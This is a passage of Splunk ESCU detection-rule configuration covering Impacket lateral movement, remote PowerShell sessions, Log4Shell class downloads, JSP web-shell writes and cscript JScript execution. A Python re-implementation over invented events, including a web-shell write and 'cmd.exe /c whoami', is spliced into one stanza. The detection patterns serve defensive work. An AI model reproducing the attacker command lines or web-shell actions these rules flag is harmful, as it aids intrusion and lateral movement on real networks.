Commandline Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. 
There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although uncommon, Administrators may leverage Impackets tools to start a process on remote systems for system administration or automation use cases. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Impacket Lateral Movement Commandline Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Suspicious command line parameters on $dest$ may represent a lateral movement attack with Impackets tools action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Impacket Lateral Movement Commandline Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto 
action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.notable.param.rule_title = Impacket Lateral Movement Commandline Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe (Processes.process = "*/Q /c * \\\\127.0.0.1\\*$*" AND Processes.process IN ("*2>&1*","*2>&1*")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `impacket_lateral_movement_commandline_parameters_filter` [ESCU - Impacket Lateral Movement smbexec CommandLine Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic focuses on identifying suspicious command-line parameters commonly associated with the use of Impacket wmiexec.py. 
Impacket is a set of Python classes designed for working with Microsoft network protocols, and it includes several scripts like wmiexec.py, smbexec.py, dcomexec.py, and atexec.py that enable command execution on remote endpoints. These scripts typically utilize administrative shares and hardcoded parameters, which can serve as signatures to detect their usage. Both Red Teams and adversaries may employ Impacket tools for lateral movement and remote code execution purposes. By monitoring for these specific command-line indicators, the analytic aims to detect potentially malicious activities related to Impacket tool usage. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic focuses on identifying suspicious command-line parameters commonly associated with the use of Impacket wmiexec.py. Impacket is a set of Python classes designed for working with Microsoft network protocols, and it includes several scripts like wmiexec.py, smbexec.py, dcomexec.py, and atexec.py that enable command execution on remote endpoints. These scripts typically utilize administrative shares and hardcoded parameters, which can serve as signatures to detect their usage. Both Red Teams and adversaries may employ Impacket tools for lateral movement and remote code execution purposes. By monitoring for these specific command-line indicators, the analytic aims to detect potentially malicious activities related to Impacket tool usage. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although uncommon, Administrators may leverage Impackets tools to start a process on remote systems for system administration or automation use cases. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Impacket Lateral Movement smbexec CommandLine Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Suspicious command-line parameters on $dest$ may represent lateral movement using smbexec. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Impacket Lateral Movement smbexec CommandLine Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic focuses on identifying suspicious command-line parameters commonly associated with the use of Impacket wmiexec.py. Impacket is a set of Python classes designed for working with Microsoft network protocols, and it includes several scripts like wmiexec.py, smbexec.py, dcomexec.py, and atexec.py that enable command execution on remote endpoints. These scripts typically utilize administrative shares and hardcoded parameters, which can serve as signatures to detect their usage. Both Red Teams and adversaries may employ Impacket tools for lateral movement and remote code execution purposes. By monitoring for these specific command-line indicators, the analytic aims to detect potentially malicious activities related to Impacket tool usage. 
action.notable.param.rule_title = Impacket Lateral Movement smbexec CommandLine Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | where match(process, "(?i)cmd\.exe\s+\/Q\s+\/c") AND match(process,"(?i)echo\s+cd") AND match(process, "(?i)\\__output") AND match(process, "(?i)C:\\\\Windows\\\\[a-zA-Z]{1,8}\\.bat") AND match(process, "\\\\127\.0\.0\.1\\.*") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `impacket_lateral_movement_smbexec_commandline_parameters_filter` [ESCU - Impacket Lateral Movement WMIExec Commandline Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although uncommon, Administrators may leverage Impackets tools to start a process on remote systems for system administration or automation use cases. 
action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Impacket Lateral Movement WMIExec Commandline Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Suspicious command-line parameters on $dest$ may represent lateral movement using wmiexec. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Impacket Lateral Movement WMIExec Commandline Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-277A", "WhisperGate", "Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. 
Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.notable.param.rule_title = Impacket Lateral Movement WMIExec Commandline Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wmiprvse.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | where match(process, "(?i)cmd\.exe\s+\/Q\s+\/c") AND match(process, "\\\\127\.0\.0\.1\\.*") AND match(process, "__\\d{1,10}\\.\\d{1,10}") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `impacket_lateral_movement_wmiexec_commandline_parameters_filter` [ESCU - Interactive Session on Remote Endpoint with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the usage of the `Enter-PSSession`. This commandlet can be used to open an interactive session on a remote endpoint leveraging the WinRM protocol. Red Teams and adversaries alike may abuse WinRM and `Enter-PSSession` for lateral movement and remote code execution. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify usage of the `Enter-PSSession` cmdlet. This cmdlet can be used to open an interactive session on a remote endpoint leveraging the WinRM protocol. Red Teams and adversaries alike may abuse WinRM and `Enter-PSSession` for lateral movement and remote code execution.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found at https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators may leverage WinRM and `Enter-PSSession` for administrative and troubleshooting tasks. This activity is usually limited to a small set of hosts or users. In certain environments, tuning may not be possible.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Interactive Session on Remote Endpoint with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = An interactive session was opened on a remote endpoint from $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Interactive Session on Remote Endpoint with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify usage of the `Enter-PSSession` cmdlet. This cmdlet can be used to open an interactive session on a remote endpoint leveraging the WinRM protocol. Red Teams and adversaries alike may abuse WinRM and `Enter-PSSession` for lateral movement and remote code execution.
action.notable.param.rule_title = Interactive Session on Remote Endpoint with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText="*Enter-PSSession*" AND ScriptBlockText="*-ComputerName*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `interactive_session_on_remote_endpoint_with_powershell_filter`

[ESCU - Java Class File download by Java User Agent - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a Java user agent performing a GET request for a .class file from a remote site. This is potentially indicative of exploitation of the Java application and may be related to CVE-2021-44228 (Log4Shell).
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
action.escu.data_models = ["Web"]
action.escu.eli5 = The following analytic identifies a Java user agent performing a GET request for a .class file from a remote site. This is potentially indicative of exploitation of the Java application and may be related to CVE-2021-44228 (Log4Shell).
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting web or proxy logs into the Web data model, or ensure it is being populated by a proxy-like device. For additional filtering, allow-list private IP space or restrict by known-good destinations.
action.escu.known_false_positives = Filtering may be required in some instances; filter as needed.
action.escu.creation_date = 2021-12-13
action.escu.modification_date = 2021-12-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Java Class File download by Java User Agent - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Log4Shell CVE-2021-44228"]
action.risk = 1
action.risk.param._risk_message = A Java user agent $http_user_agent$ was performing a $http_method$ to retrieve a remote class file.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "http_user_agent", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "http_method", "risk_object_type": "other", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Java Class File download by Java User Agent - Rule
action.correlationsearch.annotations = {"analytic_story": ["Log4Shell CVE-2021-44228"], "cis20": ["CIS 13"], "confidence": 50, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a Java user agent performing a GET request for a .class file from a remote site. This is potentially indicative of exploitation of the Java application and may be related to CVE-2021-44228 (Log4Shell).
action.notable.param.rule_title = Java Class File download by Java User Agent
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.http_user_agent="*Java*" Web.http_method="GET" Web.url="*.class*" by Web.http_user_agent Web.http_method Web.url Web.url_length Web.src Web.dest | `drop_dm_object_name("Web")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `java_class_file_download_by_java_user_agent_filter`

[ESCU - Java Writing JSP File - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the process java writing a .jsp file to disk. This is potentially indicative of a web shell being written to disk. Modify and tune the analytic based on the data ingested. For instance, it may be worth running a broad query for .jsp file writes first before performing a join.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the process java writing a .jsp file to disk. This is potentially indicative of a web shell being written to disk. Modify and tune the analytic based on the data ingested. For instance, it may be worth running a broad query for .jsp file writes first before performing a join.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting process information, including the name of the process responsible for the file changes, from your endpoints into the `Endpoint` data model under the `Processes` and `Filesystem` nodes. In addition, confirm the latest CIM App (4.20 or higher) is installed along with the latest TA for the endpoint product.
action.escu.known_false_positives = False positives are possible and filtering may be required. Restrict by assets or filter known .jsp files that are common for the environment.
action.escu.creation_date = 2022-06-03
action.escu.modification_date = 2022-06-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - Java Writing JSP File - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spring4Shell CVE-2022-22965", "Atlassian Confluence Server and Data Center CVE-2022-26134", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"]
action.risk = 1
action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ writing a jsp file $file_name$ to disk, potentially indicative of exploitation.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Java Writing JSP File - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spring4Shell CVE-2022-22965", "Atlassian Confluence Server and Data Center CVE-2022-26134", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2022-22965"], "impact": 60, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the process java writing a .jsp file to disk. This is potentially indicative of a web shell being written to disk. Modify and tune the analytic based on the data ingested. For instance, it may be worth running a broad query for .jsp file writes first before performing a join.
action.notable.param.rule_title = Java Writing JSP File
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name IN ("java","java.exe", "javaw.exe") by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.jsp*" by _time Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid Filesystem.user | `drop_dm_object_name(Filesystem)` | fields _time process_guid file_path file_name file_create_time user dest process_name] | stats count min(_time) as firstTime max(_time) as lastTime by dest process_name process_guid file_name file_path file_create_time user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `java_writing_jsp_file_filter`

[ESCU - Jscript Execution Using Cscript App - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects the execution of JScript using the cscript process. Commonly, when a user runs a JScript file it is executed by the wscript.exe application. This technique was seen in the FIN7 JS implant, which executed its malicious script using the cscript process. This behavior is uncommon and a good artifact for checking for further anomalies within the network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects the execution of JScript using the cscript process. Commonly, when a user runs a JScript file it is executed by the wscript.exe application. This technique was seen in the FIN7 JS implant, which executed its malicious script using the cscript process. This behavior is uncommon and a good artifact for checking for further anomalies within the network.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
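The two Endpoint.Processes searches above ("Java Writing JSP File" and "Jscript Execution Using Cscript App") re-implemented in Python over constructed sample events, as an added example that is not part of the ESCU content. Event dicts carry the CIM Endpoint.Processes / Filesystem field names the searches use; GUIDs, hostnames, paths and users are made up. The first function reproduces the tstats-plus-join on process_guid and the trailing stats grouping; the second reproduces the parent-or-process cscript.exe //e:jscript check.

```python
"""Added example (not ESCU code): two Endpoint searches over constructed events.

  1. "Java Writing JSP File": process events for java/java.exe/javaw.exe joined
     to Filesystem events for *.jsp* on process_guid.
  2. "Jscript Execution Using Cscript App": cscript.exe launched with //e:jscript,
     either as the process itself or as the parent of another process.
"""
from collections import defaultdict

JAVA_PROCESSES = {"java", "java.exe", "javaw.exe"}

# Constructed sample data; GUIDs, hosts, users and paths are invented.
PROCESSES = [
    {"_time": 1000, "process_guid": "G-1", "process_name": "java.exe",
     "process_id": 4212, "dest": "web01", "user": "svc_tomcat",
     "parent_process_name": "services.exe", "parent_process": "services.exe",
     "process": "java.exe -jar app.jar"},
    {"_time": 1001, "process_guid": "G-2", "process_name": "cscript.exe",
     "process_id": 5310, "dest": "ws07", "user": "jdoe",
     "parent_process_name": "explorer.exe", "parent_process": "explorer.exe",
     "process": "cscript.exe //e:jscript C:\\Users\\jdoe\\update.txt"},
    {"_time": 1002, "process_guid": "G-3", "process_name": "cmd.exe",
     "process_id": 5400, "dest": "ws07", "user": "jdoe",
     "parent_process_name": "cscript.exe",
     "parent_process": "cscript.exe //e:jscript C:\\Users\\jdoe\\update.txt",
     "process": "cmd.exe /c whoami"},
    {"_time": 1003, "process_guid": "G-4", "process_name": "notepad.exe",
     "process_id": 6000, "dest": "ws07", "user": "jdoe",
     "parent_process_name": "explorer.exe", "parent_process": "explorer.exe",
     "process": "notepad.exe"},
]
FILESYSTEM = [
    {"_time": 1000, "process_guid": "G-1", "dest": "web01",
     "file_name": "cmd.jsp", "file_path": "C:\\tomcat\\webapps\\ROOT\\cmd.jsp",
     "file_create_time": 1000, "user": "svc_tomcat"},
    {"_time": 1000, "process_guid": "G-1", "dest": "web01",
     "file_name": "app.log", "file_path": "C:\\tomcat\\logs\\app.log",
     "file_create_time": 1000, "user": "svc_tomcat"},
    {"_time": 1004, "process_guid": "G-4", "dest": "ws07",
     "file_name": "notes.jsp", "file_path": "C:\\Users\\jdoe\\notes.jsp",
     "file_create_time": 1004, "user": "jdoe"},
]


def java_writing_jsp(processes, filesystem):
    """Java process events joined to .jsp file writes on process_guid, then
    grouped like the search's trailing `stats count min(_time) max(_time) by ...`."""
    java_by_guid = {p["process_guid"]: p for p in processes
                    if p["process_name"].lower() in JAVA_PROCESSES}
    grouped = defaultdict(lambda: {"count": 0, "firstTime": None, "lastTime": None})
    for f in filesystem:
        if ".jsp" not in f["file_name"].lower():      # Filesystem.file_name="*.jsp*"
            continue
        proc = java_by_guid.get(f["process_guid"])    # the join on process_guid
        if proc is None:
            continue                                  # .jsp written by a non-java process
        key = (f["dest"], proc["process_name"], f["process_guid"],
               f["file_name"], f["file_path"], f["file_create_time"], f["user"])
        g = grouped[key]
        g["count"] += 1
        g["firstTime"] = f["_time"] if g["firstTime"] is None else min(g["firstTime"], f["_time"])
        g["lastTime"] = f["_time"] if g["lastTime"] is None else max(g["lastTime"], f["_time"])
    return dict(grouped)


def jscript_via_cscript(processes):
    """cscript.exe with //e:jscript on the command line, as the process itself
    or as the parent; SPL wildcards are case-insensitive, so compare lowercased."""
    hits = []
    for p in processes:
        as_parent = (p["parent_process_name"].lower() == "cscript.exe"
                     and "//e:jscript" in p["parent_process"].lower())
        as_process = (p["process_name"].lower() == "cscript.exe"
                      and "//e:jscript" in p["process"].lower())
        if as_parent or as_process:
            hits.append(p)
    return hits


if __name__ == "__main__":
    for key, agg in java_writing_jsp(PROCESSES, FILESYSTEM).items():
        print("JSP write:", key, agg)
    for p in jscript_via_cscript(PROCESSES):
        print("cscript //e:jscript:", p["dest"], p["process_name"], p["process"])
```

The notepad.exe write of notes.jsp is dropped by the join, which is exactly why the JSP stanza suggests running the broad Filesystem query first: a web shell dropped by a process other than java (or by java under a name outside the IN list) is invisible to the joined search.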
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2021-09-13
action.escu.modification_date = 2021-09-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Jscript Execution Using Cscript App - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["FIN7", "Remcos"]
action.risk = 1
